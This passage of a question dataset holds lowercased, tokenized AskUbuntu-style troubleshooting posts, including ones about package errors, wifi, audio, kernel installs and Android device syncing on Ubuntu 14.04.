live . i have also uninstalled and reinstalled apache2 which did reinstall the apache2.conf file that gives the error , seeing as the stuff that i have added to the file are gone and the error changed from line 80 to line 74 but is the same error .
516960	install phpmyadmin error	i want to install phpmyadmin on ubuntu 14.04 lts and type the following commands , but i get the following error message on either one of the following command . anything i can check the configuration for this ? your help and information is great appreciated , sudo apt-get update sudo apt-get install phpmyadmin e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem .
516961	ubuntu 14.04 lts wo n't accept wifi password	have installed all updates and upgrades . wifi worked on my campus that has no wifi password , but when i attempt to connect to home network ( with correct password ) it waits a few seconds and finally asks for authentication again . any tips would help !
516965	changing windows layout close , minimize , maximize , menu keys	i 've searched out around and found out this useful tool named unity tweak , however once i try to change my key ( close , minimize , maximize & menu ) positions , nothing happens ... not sure if i 'm the only one experiencing this , i was wondering if there 's another way i could do this . i 'm kinda new to ubuntu and this whole linux thing so please bear with me if my question seems a bit stupid , i installed ubuntu today , an hour ago ... i 'm running on ubuntu 14.04 lts thanks in advance !
516967	how to install mathematica 10 on ubuntu 14.04 step by step ( i am brand spanking new to ubuntu )	i am trying to install mathematica 10 on ubuntu 14.04 , i have acquired the program in the downloads folder but i am unable to extract the file upon right clicking and hitting `` extract here '' . i did read around about some of the ways others have gotten mathematica to run , however being a complete newbie , i did not understand what specific things meant ( mounting to a cd , as well as what commands meant ) and many of the steps i had to take to install it . how can i get mathematica 10 and all its functions to install from start to finish ? also being new , i would like to learn as much as i can to become really effective in ubuntu , if anyone knows of any resources to get me up to speed could you list them ? i would greatly appreciate it ! i am starting off with the book ubuntu an absolute beginners guide . hopefully i can become effective and independent so i do n't have to continue to ask bad questions . thank you so much !
516968	no sound on 1080p video	whenever i run a 1080p saved file , there 's no sound . 720p and lower resolution videos plays ok . i have ubuntu 14.04 lts 64 bit i tried running it via mplyaer , smplayer , and vlc . same results . when i play 1080p files online , like youtube , it lags but at least it have sound . any ideas on what should i do ? please note , use muggle words , i am a noob afterall .
516973	what does the mount used for ? what does they mean ?	i have dual boot many time normally i use / as / is the top of hierarchical model of os what does other like : - /boot /home /tmp /usr /var /srv /opt /urs/local used for ? what are meaning of these ?
516974	how do i make ubuntu 14.04 recognize my galaxy s4 as a microphone via 3.5mm jack/usb ?	long story short , i 'm trying to get some screen recording done and my puppy chewed my microphone rendering it useless . i 've managed to get the samsung galaxy s4 i9505 connected as a microphone through both usb and 3.5mm jack on windows os however , i am trying to eliminate ms windows from my pc and i want to get everything i need to be done with ubuntu . i 've downloaded an app on the phone `` mic to speaker '' and i 've connected the phone to the pc via a 3.5mm jack however in the sound app at input , nothing 's moving except the `` built in '' mic which only hears ubuntu , meaning the clicks , the beeps . does anyone know how i can get my galaxy s4 to become a microphone for my ubuntu os ?
516975	hide from other users the folders they do not have read and execute permissions	for the sake of this question , assume there is user1 and user2 , besides the root user of course . i want to share ( rx ) with user2 an specific folder within user1 home ( say , /home/user1/music/aerosmith/ ) . i can use chmod for the respective permissions and all is fine : user2 can explore and play the content of that folder . now , as user2 moves into the shared folder , she can actually see all the other subfolders present at each stage ( e.g . it can see that there is a folder called /home/user1/music/madonna ) even though she can not access them . now , what i want is for user2 to only see the folders she is allowed to read and execute , hiding all the other things i 'm not sharing with her . folders need to be invisible either from a gui perspective ( say , in thunar ) or using ls . i ca n't find a solution for this . is it just impossible from the command line perspective ?
516976	usb dongle windows program	how to detecting usb dongle and run application with dongle key ? , i am using spectrometer , and the program run on win xp . and now the xp was crash down , so i try to run it on ubuntu with wine.. massage `` invalid key '' , how to solve that problem .
516978	how to enable hyperz on radeon hd 5000 series ?	i have surfed around the web to enabling hyperz by adding this parameter r600_debug=hyperz , but where i must put it ? is it at /etc/default/grub ? and what the difference between r600_debug=hyperz ; r600_hyperz=1 ; and radeon_hyperz=1 and which must i choose ? my card : ati mobility radeon hd5650
516981	how to install ubuntu 14.04.1 in dual boot with windows 8 in notebook asus r103b x102ba amd a4 with uefi securety boot	i would like to know how to setup bios uefi in my notebook asus r103b x102ba amd a4 in order it can read ubuntu 14.04.1 installed via unetbootin in a pendrive usb . i want to install it in dual boot mode with windows 8 that came installed in uefi securety boot from factory .
516985	after upgrading to trusty my keymap file is n't working for my tivo_slide remote	i tried creating this file : ‍/etc/udev/hwdb.d/61-keyboard-local.hwdb it looks like this : lee @ tv : /etc/udev/hwdb.d $ cat /etc/udev/hwdb.d/61-keyboard-local.hwdb keyboard : usb : v150ap1201* keyboard_key_0xc0041=enter keyboard_key_0xffff003d=esc keyboard_key_0xffff0041=/ keyboard_key_0xffff0042= ? keyboard_key_0xc00b0=f1 keyboard_key_0xc00f5=f2 keyboard_key_0xc00b4= < keyboard_key_0xc00b3= > keyboard_key_0xc00b1=p keyboard_key_0xc00e2=f3 keyboard_key_0xc00b2=f4 keyboard_key_0xc006c=v keyboard_key_0xc006b=b keyboard_key_0xc0069=n keyboard_key_0xc006a=f5 keyboard_key_0xc009d=pgdown keyboard_key_0xc009c=pgup keyboard_key_0xc00ea=f6 keyboard_key_0xc00e9=f7 keyboard_key_0xc0082=f8 keyboard_key_0xc0030=f9 keyboard_key_0xffff003e=f10 keyboard_key_0xc0209=i keyboard_key_0xc008d=s keyboard_key_0xc00b6=f11 keyboard_key_0xc00b5=f12 after creating the file , i ran udevadm hwdb -- update and my mapped keys did n't work . below is dmesg output for my tivo_slide . not sure if i have the format of the above file correct . recommendations ? lee @ tv : /etc/udev/hwdb.d $ dmesg|grep 1201 [ 3.111507 ] usb 6-1.1 : new usb device found , idvendor=150a , idproduct=1201 [ 4.259099 ] input : hid 150a:1201 as /devices/pci0000:00/0000:00:1d.0/usb6/6-1/6-1.1/6-1.1:1.0/input/input16 [ 4.259280 ] tivo_slide 0003:150a:1201.0003 : input , hiddev0 , hidraw3 : usb hid v1.11 keypad [ hid 150a:1201 ] on usb-0000:00:1d.0-1.1/in
516986	ubuntu nanny not working properly	i have installed nanny for limiting my browser usage time but it behaves randomly . it blocks the internet access for one particular user . i tried to uninstall it but i ca n't access internet from that user account . i reinstalled nanny but now the nanny-admin-console is giving me the following error kspinbutton : setting an adjustment with non-zero page size is deprecated object.xml.add_from_file ( main_ui_filename ) /usr/lib/python2.7/dist-packages/nanny/client/common/utils.py:54 : futurewarning : this search is broken in 1.3 and earlier , and will be fixed in a future version . if you rely on the current behaviour , change it to './/object' for obj in xml.findall ( '//object ' ) : uid : 1001 , name : temp , user_name : temp i was just fed up and then changed my username usermod -l newuser olduser but that too does n't seem to work . any help is appreciated .
516988	missing hardrive on 14.04	i am completely new to ubuntu , and the only previous experience i have with linux is on android . today i installed 14.04 alongside windows vista since it 's a shared computer and my brother is stubborn . after giving ubuntu a once over i decided i loved it but soon noticed that i 'm missing a hardrive , i have 120gb main boot which has vista installed , a 20gb and two other 80gb which i have stiped together for media and my steam library . so c : as boot , d : as spare where i have ubuntu installed , and then i : as the striped media drive . ( i : ) is missing , all it will show me is c : and d : . does anyone know how i can fix this or have some troubleshooting i can do ?
516989	ubuntu 14.04 not working properly after system failure	i recently installed the os and updated all the drivers . was just running firefox and the system hanged . logged out , and restarted just to see the grub boot loader turned from purple to black and also the ubuntu desktop background turned to black . the system hangs as usual after some minutes of startup . is there anything i can do ?
516992	total system failure on ubuntu 14.04	i have a lenovo thinkcentre that just had ubuntu 14.04 installed on it . i installed restricted extras , attempted to turn on the firewall in the terminal , and made a few extra tweaks . now there is a ghost in my machine . for some reason , i have no control over the mouse , it opens pages and documents on it 's own , and there are ghosts in my screen . my question is this : is there an easy way to reconfigure ubuntu 14.04 back to when it was freshly installed ? i 'd like to have a do over ! also , i spilled a glass of water on the router , but i do n't think this is the problem .
516993	broken audio on chromebook . xbuntu	i have dual-booted my chromebook with xubuntu 14.04 and have found that the sound is broken . i have tried everyhting that has been mentioned on the internet . i have restarted pulse , uninstalled it , unmuted sound in alsamixer , and nothing . the sound device shows up in settings as dummydevice . i have gotten everything else working except this , sound issue . i have a samsung series 3 arm chromebook . i believe that this might fix it , but my low skill level has kept me from copying the files . copy some alsa support files from chrome : cp /media/root-a/usr/share/alsa/ucm/daisy-i2s/hifi.conf /usr/share/alsa/ucm/daisy-i2s edit /etc/pulse/default.pa to add this line : load-module module-alsa-sink device=sysdefault any advice ? ( update ) i have inserted the hifi.conf file into xubuntu and add the line to the default.pa . it nolonger has the name `` dummy '' , but there is still no sound . i have a copy of the `` alsa-alsa-lib '' folder from chrome . which i think contains the necessary files , now where do i put it .
516995	teamviewer not remembering teamviewer account	i 'm using teamviewer for my remote desktop needs . on any linux version of teamviewer , it uses wine as a compatibility back-end ( presumably so the dev 's do n't have to support another os ) . it works relatively fine , however , one problem is pretty big - my teamviewer account is not remembered between sessions , despite using the `` remember me '' checkbox . this means that i have to login to my teamviewer account on every startup , in order to connect to my other computers . is there any way to fix this ? i doubt this is the intended behavior . uname -a : linux hostname 3.13.0-34-generic # 60-ubuntu smp wed aug 13 15:49:09 utc 2014 i686 i686 i686 gnu/linux
516996	what swapfile size to make ? i have 4gb ram	very often i am out of memory and i noticed that i did n't have swapfile ... what size should i choose ? i have 4 ram . all programs which i use are : firefox , thunderbird , grive , android studio , that 's it ... and my laptop freezes pretty often ... any advice , please ?
516998	installation requirements	is it possible to install ubuntu 14.0 in a sony vaio pcg-7m1l ? i tried to install ubuntu from a memory stick but the laptop did not have a boot option for usb port .
516999	create folders under places	how can i add folders under places menu in ubuntu gnome with custom vector icons . there are few post already there . but the hard part is it is for ubuntu 13.10 and the answers are based on unity environment and it wo n't perfectly works in single attempt in 14.04 . there fore new answers are needed . do n't suggest bookmarks need to delete recent activity custom icon before each folders
517003	wifi interface does n't come up	all of sudden , my builtin wifi interface on the laptop ( hp pavilion dv7 , running ubuntu 12.04 , kernel 3.2.0-64-generic ) wo n't come up . # ifconfig wlan0 wlan0 link encap : ethernet hwaddr 40:25 : c2 : d9 : fb:8c up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) # iwconfig wlan0 wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off '' dmesg '' command shows addrconf ( netdev_up ) : wlan0 : link is not ready here are some of the kernel modules # lsmod | grep iw iwlwifi 381794 0 mac80211 543880 1 iwlwifi cfg80211 210370 2 iwlwifi , mac80211 compat 13447 7 iwlwifi , mac80211 , cfg80211 , bnep , rfcomm , bluetooth , usbnet i have the `` network-manager '' running , the icon is in the system tray , but it does n't show any wireless network even though it 's only a few feet away from the wifi router ( my cell phone can talk to the wifi router fine ) . command `` iwlist wlan0 scan '' show a list essids ( including my wifi router ) . i have tried the following but it did n't help . sudo ifdown wlan0 sudo ifup wlan0 rebooting the laptop did n't help either . any help will be greatly appreciated ! part of dmesg [ 5534.540251 ] iwlwifi 0000:07:00.0 : pci int a disabled [ 5544.897099 ] cfg80211 : calling crda to update world regulatory domain [ 5544.907411 ] cfg80211 : world regulatory domain updated : [ 5544.907414 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 5544.907416 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 5544.907418 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 5544.907419 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 5544.907421 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 5544.907423 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 5544.910517 ] iwlwifi : intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 5544.910519 ] iwlwifi : copyright ( c ) 2003-2012 intel corporation [ 5544.910605 ] iwlwifi 0000:07:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 5544.910651 ] iwlwifi 0000:07:00.0 : setting latency timer to 64 [ 5544.910692 ] iwlwifi 0000:07:00.0 : pci_resource_len = 0x00002000 [ 5544.910694 ] iwlwifi 0000:07:00.0 : pci_resource_base = ffffc90012614000 [ 5544.910695 ] iwlwifi 0000:07:00.0 : hw revision id = 0x67 [ 5544.910856 ] iwlwifi 0000:07:00.0 : irq 53 for msi/msi-x [ 5544.915028 ] iwlwifi 0000:07:00.0 : loaded firmware version 41.28.5.1 build 33926 [ 5544.915490 ] iwlwifi 0000:07:00.0 : config_iwlwifi_debug disabled [ 5544.915500 ] iwlwifi 0000:07:00.0 : config_iwlwifi_debugfs enabled [ 5544.915508 ] iwlwifi 0000:07:00.0 : config_iwlwifi_device_tracing enabled [ 5544.915515 ] iwlwifi 0000:07:00.0 : config_iwlwifi_device_testmode disabled [ 5544.915523 ] iwlwifi 0000:07:00.0 : config_iwlwifi_p2p enabled [ 5544.915531 ] iwlwifi 0000:07:00.0 : detected intel ( r ) centrino ( r ) wireless-n + wimax 6150 bgn , rev=0x84 [ 5544.915733 ] iwlwifi 0000:07:00.0 : l1 enabled ; disabling l0s [ 5544.926407 ] iwlwifi 0000:07:00.0 : device eeprom ver=0x557 , calib=0x6 [ 5544.926411 ] iwlwifi 0000:07:00.0 : device sku : 0x150 [ 5544.926414 ] iwlwifi 0000:07:00.0 : valid tx ant : 0x1 , valid rx ant : 0x3 [ 5544.926433 ] iwlwifi 0000:07:00.0 : tunable channels : 13 802.11bg , 0 802.11a channels [ 5544.926586 ] registered led device : phy0-led [ 5544.926621 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 5544.926785 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs'
517004	nexus 4 ubuntu touch - no internet connection while cellurar data only enabled	i have loaded ubuntu touch on my nexus 4 and i do n't seem to get the internet to work while cellular data is enabled only . wi-fi works ok but as soon as i step outside the house and loose the wi-fi , i 'm on my own..lol i have loaded the latest developer build : carrier is t-mobile usa . root @ ubuntu-phablet : ~ # system-image-cli -i current build number : 203 device name : mako channel : devel alias : ubuntu-touch/utopic last update : 2014-08-24 16:32:04 version version : 203 version ubuntu : 20140821.1 version device : 20140811.1 ... ... ... ... ... ... ... ... . if anybody finds a way to get this working by all means help ... ! mt
517006	is it possible to install python 3.x in 14.04 lts ?	i 'm looking to pick up some programming skills and after looking into it a bit , i came across an article that recommended that i learn python as a way of getting started at programming before moving on to other languages . i realize python 2.x.x is preinstalled in ubuntu , but i was wondering if it 's possible to upgrade to python 3.x.x as the site 's documentation seems to indicate that 3.x.x is where the language is going in the future . failing that , how do i update python 2.7.6 to 2.7.8 ?
517010	problem with java swing code	when i write some simple java code using swing , i get some strange behavior . the screen around the jframe is black , and initially is displayed off of the screen . i have run the same code on a windows computer , and it looks fine , so i know it 's not a problem with the code . the following is the version of java that i have installed . java version `` 1.7.0_65 '' openjdk runtime environment ( icedtea 2.5.1 ) ( 7u65-2.5.1-4ubuntu1~0.14.04.2 ) openjdk 64-bit server vm ( build 24.65-b04 , mixed mode
517012	php.ini file change not reflecting in phpinfo ( )	my php.ini settings are not reflected in phpinfo . it still shows upload_max_filesize as 2m but i have set it to 50m in php.ini . can you please tell how to change php.ini properly ? i 'm using ubuntu 14.04 and i made changes to file in /etc/php5/apache2/php.ini as described in find the correct php.ini file and also restarted apache server and even restarted my laptop . is this the right php.ini file i 'm making changes to ? what could be the possible reasons ?
517015	battery charge indicator malfunctioning on acer netbook ( 14.04 lts , 32-bit )	my nephew has an acer aspire one series netbook , model zg5 . so it 's old hardware . i replaced windows xp with 32-bit 14.04 lts and it runs quite admirably . the one bug we 've found , though , is that after a full charge , when you unplug the netbook , the battery charge indicator continues to indicate that it is 100 % and `` charged '' indefinitely ( the little lightning bolt that indicates that the computer is plugged in remains ) . we have to then plug the machine in a second time , and then the battery charge indicator seems to update itself , changing to xx % . after this , when we unplug the machine the battery indicator works normally until the next full charge . what might cause this ?
517017	error creating the child process , partition resize , mounting and running without error msg	so i use furiousmount to help me out with the mounting since when i tried to mount thru terminal i had some complications . so back to the things i need help with . i get the error message . ( shown on the screenshot ) what i 've done . mounting thru furiousmount . after mounting run in terminal i then got the message error creating ... . so what i did was writing ls -la / .hejhej_iso/gpl as i saw in another thread . when i did my eye caught my the tmp in green . i tried to find answers but did not therefore i ask here what i should do ? what i want to accomplish in the end is to resize my partition for linux . if there are easier steps for this please enlighten me . if not . please tell me how i can get my gparted program mounted and installed with furiousmount or without . ( babysteps please ) if possible to resize partition without gparted please enlighten me that instead . honestly it does n't really matter how i do this as long as i can resize my partition . the fewer steps the better it is for me . so question is : how do i resize my partition ? with gparted or without , if with gparted how do i get the iso file mounted ( with or without furiousmount ) ? screenshot here ``
517018	how do i get banshee to work with my android 4.4.2 device ?	i have a new galaxy s5 ( sc-04 ) , with android 4.4.2 . when i plug it in as an mtp media device , it 's visible in nautilus ( gnome flashback , ubuntu 14.04 ) and i can browse and edit files and folders no problem . in banshee 2.6.2 , though , there are many problems . it takes a long time , 5 to 10 minutes for the android to appear in the banshee interface . when it does , it does not recognize any of the existing music folders or files . if i try to sync , it outputs an error saying the sync failed for each music file , and then banshee crashes . how do i get banshee to sync with my android device ? as requested in comments , i ran banshee > output at the command line . this time , i had the samsung attached before starting banshee , which seemed to prevent the samsung from appearing in the nautilus interface . eventually banshee crashed . here is the contents of the output file : [ info 13:37:21.765 ] running banshee 2.6.2 : [ ubuntu 14.04.1 lts ( linux-gnu , x86_64 ) @ 2014-08-12 14:04:38 utc ] [ info 13:37:23.143 ] updating web proxy from gconf [ info 13:37:23.175 ] all services are started 1.097818 [ info 13:37:24.325 ] nereid client started [ info 13:37:24.419 ] gstreamer version 1.2.4.0 , gapless : true , replaygain : false [ warn 13:38:10.893 ] failed to load media-player-info file for 1 [ warn 13:38:10.926 ] failed to load media-player-info file for 1 i ca n't seem to get the samsung to even appear in the banshee interface right now , which is different from other times . i will keep trying , but if the above output reveals anything , please let me know . update 2 : i was able to get the samsung to appear in banshee , and i attempted a sync . the output was lenghty , and so i 've placed it here on pastebin . i hope that contains some useful information . output from lsusb -vd 04e8:6860 is here on pastebin as well . here is the output of tail -f /var/log/syslog > some_file after connecting the device : sep 8 14:42:09 dave-laptop networkmanager [ 857 ] : < info > nameserver '103.5.140.11' sep 8 14:42:09 dave-laptop networkmanager [ 857 ] : < info > nameserver '103.5.140.12' sep 8 14:42:09 dave-laptop networkmanager [ 857 ] : < info > domain name 'wi2.ne.jp' sep 8 14:42:09 dave-laptop dbus [ 686 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) sep 8 14:42:09 dave-laptop dbus [ 686 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' sep 8 14:42:52 dave-laptop wpa_supplicant [ 1229 ] : wlan0 : ctrl-event-scan-started sep 8 14:42:57 dave-laptop wpa_supplicant [ 1229 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 sep 8 14:43:46 dave-laptop kernel : [ 11242.754380 ] usb 3-2 : usb disconnect , device number 6 sep 8 14:43:46 dave-laptop colord : device removed : sysfs- ( null ) sep 8 14:43:46 dave-laptop colord : device removed : sysfs-samsung-samsung_android sep 8 14:44:15 dave-laptop kernel : [ 11271.999851 ] usb 3-2 : new high-speed usb device number 7 using xhci_hcd sep 8 14:44:15 dave-laptop kernel : [ 11272.017478 ] usb 3-2 : new usb device found , idvendor=04e8 , idproduct=6860 sep 8 14:44:15 dave-laptop kernel : [ 11272.017488 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 sep 8 14:44:15 dave-laptop kernel : [ 11272.017493 ] usb 3-2 : product : samsung_android sep 8 14:44:15 dave-laptop kernel : [ 11272.017498 ] usb 3-2 : manufacturer : samsung sep 8 14:44:15 dave-laptop kernel : [ 11272.017502 ] usb 3-2 : serialnumber : 4ce88c0d sep 8 14:44:15 dave-laptop colord : device added : sysfs-samsung-samsung_android sep 8 14:44:15 dave-laptop colord : device added : sysfs- ( null ) out from ps aux | grep -i [ m ] tp : dave 2348 0.0 0.1 218368 4176 ? sl 11:46 0:00 /usr/lib/gvfs/gvfs-mtp-volume-monitor dave 5110 0.1 0.1 446628 3956 ? sl 11:52 0:00 /usr/lib/gvfs/gvfsd-mtp -- spawner :1.3 /org/gtk/gvfs/exec_spaw/2 not a solution at all , but , if i completely disable the mtp plugin in banshee , then switch my phone to ptp mode , then i can transfer some files . however , for some reason this method causes some process to eat up memory , and if i try to tansfer too many files , the memory overflows and banshee crashes . so , i can get about 300 to 500 songs transferred , but no more .
517020	.desktop restore icon expects what size ?	i created a .desktop file and set its icon to a png file that is 144x144 pixels . however on creation the icon is a white paper . i have to click resize and make it either bigger or smaller to take . and while i resize if i pass that default size it shows that page . maybe if i provided the right size of icon it would n't show this page icon ? it resizes absolutely beautifully though ! to really big and to really small , linux is awesome . edit : if i right-click a resized icon and select `` restore icons original size '' , it restores to that white page .
517021	flumotion worker falied to start	i was trying to start flumotion using flumotion streaming server administration wizard . but it failed with the following error message : could n't start worker the command that failed was : /usr/sbin/flumotion -c /tmp/tmpqxp6on.flumotion/etc -l /tmp/tmpqxp6on.flumotion/var/log -r /tmp/tmpqxp6on.flumotion/var/run start worker admin the command exited with an exit code of 1 .
517024	error on installing upstream kernel	i tried to install latest upstream kernel ( linux-headers-3.17.0-031700rc2-generic_3.17.0-031700rc2.201408251935_amd64.deb ) from here but installation failed with this error : user @ user-pc : ~ $ sudo dpkg -i linux-headers-3.17.0-031700rc2-generic_3.17.0-031700rc2.201408251935_amd64.deb ( reading database ... 228154 files and directories currently installed . ) preparing to unpack linux-headers-3.17.0-031700rc2-generic_3.17.0-031700rc2.201408251935_amd64.deb ... unpacking linux-headers-3.17.0-031700rc2-generic ( 3.17.0-031700rc2.201408251935 ) over ( 3.17.0-031700rc2.201408251935 ) ... dpkg : dependency problems prevent configuration of linux-headers-3.17.0-031700rc2-generic : linux-headers-3.17.0-031700rc2-generic depends on linux-headers-3.17.0-031700rc2 ; however : package linux-headers-3.17.0-031700rc2 is not installed . dpkg : error processing package linux-headers-3.17.0-031700rc2-generic ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-headers-3.17.0-031700rc2-generic i tried to install with using gdebi and i get this error : user @ user-pc : ~ $ sudo gdebi linux-headers-3.17.0-031700rc2-generic_3.17.0-031700rc2.201408251935_amd64.deb reading package lists ... done building dependency tree reading state information ... done building data structures ... done building data structures ... done this package is uninstallable dependency is not satisfiable : linux-headers-3.17.0-031700rc2 after that i saw this icon on top bar : by right-click on it , this error message written in it : an error occurred , please run package manager from the right-click menu or apt-get in a teminal to see what is wrong . the error message was : 'error : brokencount > 0 ' . this usually means that your installed packages have unment dependences and three another options such as show updates , show notifications and preferences . i click on show updates and now this window start to upgrade the distribution now that finished with this window shown : i choice remove and popup window asks `` restart to complete '' , and after restart i tried to install again this kernel but i get the same errors that i mentioned in above . here is the output of try install again with some error : user @ user-pc : ~ $ cd /home/user/install-kernel user @ user-pc : ~/install-kernel $ sudo dpkg -i *.deb [ sudo ] password for user : ( reading database ... 255488 files and directories currently installed . ) preparing to unpack linux-headers-3.17.0-031700rc2_3.17.0-031700rc2.201408251935_all.deb ... unpacking linux-headers-3.17.0-031700rc2 ( 3.17.0-031700rc2.201408251935 ) over ( 3.17.0-031700rc2.201408251935 ) ... preparing to unpack linux-headers-3.17.0-031700rc2-generic_3.17.0-031700rc2.201408251935_amd64.deb ... unpacking linux-headers-3.17.0-031700rc2-generic ( 3.17.0-031700rc2.201408251935 ) over ( 3.17.0-031700rc2.201408251935 ) ... preparing to unpack linux-image-3.17.0-031700rc2-generic_3.17.0-031700rc2.201408251935_amd64.deb ... done . unpacking linux-image-3.17.0-031700rc2-generic ( 3.17.0-031700rc2.201408251935 ) over ( 3.17.0-031700rc2.201408251935 ) ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.17.0-031700rc2-generic /boot/vmlinuz-3.17.0-031700rc2-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.17.0-031700rc2-generic /boot/vmlinuz-3.17.0-031700rc2-generic setting up linux-headers-3.17.0-031700rc2 ( 3.17.0-031700rc2.201408251935 ) ... setting up linux-headers-3.17.0-031700rc2-generic ( 3.17.0-031700rc2.201408251935 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.17.0-031700rc2-generic /boot/vmlinuz-3.17.0-031700rc2-generic error ( dkms apport ) : kernel package linux-headers-3.17.0-031700rc2-generic is not supported error ! bad return status for module build on kernel : 3.17.0-031700rc2-generic ( x86_64 ) consult /var/lib/dkms/bcmwl/6.30.223.141+bdcom/build/make.log for more information . error ( dkms apport ) : kernel package linux-headers-3.17.0-031700rc2-generic is not supported error ! bad return status for module build on kernel : 3.17.0-031700rc2-generic ( x86_64 ) consult /var/lib/dkms/nvidia-304-updates/304.117/build/make.log for more information . setting up linux-image-3.17.0-031700rc2-generic ( 3.17.0-031700rc2.201408251935 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) not updating initrd symbolic links since we are being updated/reinstalled ( 3.17.0-031700rc2.201408251935 was configured last , according to dpkg ) not updating image symbolic links since we are being updated/reinstalled ( 3.17.0-031700rc2.201408251935 was configured last , according to dpkg ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.17.0-031700rc2-generic /boot/vmlinuz-3.17.0-031700rc2-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.17.0-031700rc2-generic /boot/vmlinuz-3.17.0-031700rc2-generic error ( dkms apport ) : kernel package linux-headers-3.17.0-031700rc2-generic is not supported error ! bad return status for module build on kernel : 3.17.0-031700rc2-generic ( x86_64 ) consult /var/lib/dkms/bcmwl/6.30.223.141+bdcom/build/make.log for more information . error ( dkms apport ) : kernel package linux-headers-3.17.0-031700rc2-generic is not supported error ! bad return status for module build on kernel : 3.17.0-031700rc2-generic ( x86_64 ) consult /var/lib/dkms/nvidia-304-updates/304.117/build/make.log for more information . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.17.0-031700rc2-generic /boot/vmlinuz-3.17.0-031700rc2-generic update-initramfs : generating /boot/initrd.img-3.17.0-031700rc2-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.17.0-031700rc2-generic /boot/vmlinuz-3.17.0-031700rc2-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.17.0-031700rc2-generic /boot/vmlinuz-3.17.0-031700rc2-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.17.0-031700rc2-generic /boot/vmlinuz-3.17.0-031700rc2-generic generating grub configuration file ... found linux image : /boot/vmlinuz-3.17.0-031700rc2-generic found initrd image : /boot/initrd.img-3.17.0-031700rc2-generic found linux image : /boot/vmlinuz-3.13.0-34-generic found initrd image : /boot/initrd.img-3.13.0-34-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin found windows 8 ( loader ) on /dev/sda1 done user @ user-pc : ~/install-kernel $
517025	not able to get the kde desktop after upgrading from 10.04 to 14.04	i upgraded my laptop from kubuntu 10.04lts to 14.04lts . after upgrade i am not able to get the launchbar , i only see desktop items . after google-ing i tried to re-install unity/compiz but i got this error . sudo apt-get install unity compiz reading package lists ... building dependency tree ... reading state information ... the following new packages will be installed : compiz-core 0 upgraded , 1 newly installed , 0 to remove and 2 not upgraded . 5 not fully installed or removed . need to get 0 b/297 kb of archives . after this operation , 1,188 kb of additional disk space will be used . ( reading database ... 399648 files and directories currently installed . ) preparing to unpack ... /compiz-core_1 % 3a0.9.11.2+14.04.20140714-0ubuntu1_i386.deb ... unpacking compiz-core ( 1:0.9.11.2+14.04.20140714-0ubuntu1 ) ... dpkg : error processing archive /var/cache/apt/archives/compiz-core_1 % 3a0.9.11.2+14.04.20140714-0ubuntu1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/compiz ' , which is also in package compiz-wrapper 1:0.8.4-0ubuntu2.1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/compiz-core_1 % 3a0.9.11.2+14.04.20140714-0ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
517027	lenovo l530 - trackpoint problem	as stated on : http : //www.ubuntu.com/certification/hardware/201201-10388/ so i just bought this lenovo l530 , and i installed ubuntu 12.04.2 lts 64-bit on the link there is also information : the following components are contained in the lenovo thinkpad l530 notebook , which has been awarded the status of certified for ubuntu . mouse advanced silicon s.a. tpps/2 ibm trackpoint touchpad advanced silicon s.a. synps/2 synaptics touchpad my trackpoint does n't work on `` certified '' version of ubuntu ( i also tried 14.04 ) i want my trackpoint working and touchpad turned off
517029	how to mount a samsung galaxy s5 ?	my laptop runs on ubuntu 12.04 and when trying to connect my phone to access files through the usb port , this comes up : unable to mount samsung_android error initializing camera : -60 : could not lock the device i 've already enabled the usb debbuging option in developers options and it 's connected as a media device ( mtp ) .
517032	touchpad not working/detected on 14.04 also error while startup booting	i recently updated my dell 15 laptop from 12.04 to 14.04.. but now i am facing problem while starting up . it types some texts on blacks screen saying ^\^\^\^\^\^\^\^\^.. on and on.. and does not show me options for selection for memory test and other options that generally come . after logging in find touch-pad not responding/ detected but an external mouse works fine . i have only one os in my system which came with pre-installed 12.04 please suggest a solution..
